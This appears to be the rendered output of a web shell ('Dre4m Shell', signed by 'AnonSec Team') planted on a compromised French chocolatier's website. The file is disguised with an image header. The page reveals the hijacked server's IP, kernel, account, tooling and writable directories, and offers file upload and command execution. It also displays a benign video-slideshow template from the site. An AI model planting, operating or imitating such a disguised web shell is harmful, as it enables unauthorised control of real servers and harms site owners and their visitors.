ÿØÿàJFIF``ÿþxØ Dre4m Was Here
Dre4m Shell
Server IP : 109.234.164.53  /  Your IP : 216.73.216.136
Web Server : Apache
System : Linux cervelle.o2switch.net 4.18.0-553.32.1.lve.el8.x86_64 #1 SMP Thu Dec 19 13:14:03 UTC 2024 x86_64
User : computer3 ( 1098)
PHP Version : 7.1.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/computer3/lachocolateriedevirginie.fr/business/business/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/computer3/lachocolateriedevirginie.fr/business/business/Slideshow_full_video.tpl
<div class="slidefull" style="">
<div class="slide" style="">

{foreach $slideshow as $slide}
{if $slide.status == '1'}
   
<div class="hvideo" style="">
<video poster="{$url}uploadfiles/slideshows/{$slide.picture}" id="bgvid" playsinline autoplay muted loop>
				<source type="video/webm" src="{$url}video/{$slide.video}.webm" />				
        <source type="video/mp4" src="{$url}video/{$slide.video}.mp4" />
</video> 

<div id="polina">
 <div class="container">
 {$slide.content}                                    
 <div style=""><button>Pause</button></div>  
<br /> </div>
</div>
</div>
</div>




{/if}
{/foreach}
</div>
</div>
<script>
var vid = document.getElementById("bgvid");
var pauseButton = document.querySelector("#polina button");
function vidFade() {
  vid.classList.add("stopfade");
}

vid.addEventListener('ended', function()
{
// only functional if "loop" is removed 
vid.pause();
// to capture IE10
vidFade();
}); 

pauseButton.addEventListener("click", function() {
  vid.classList.toggle("stopfade");
  if (vid.paused) {
    vid.play();
    pauseButton.innerHTML = "Pause";
  } else {
    vid.pause();
    pauseButton.innerHTML = "En pause";
  }
})
</script>  

Anon7 - 2022
AnonSec Team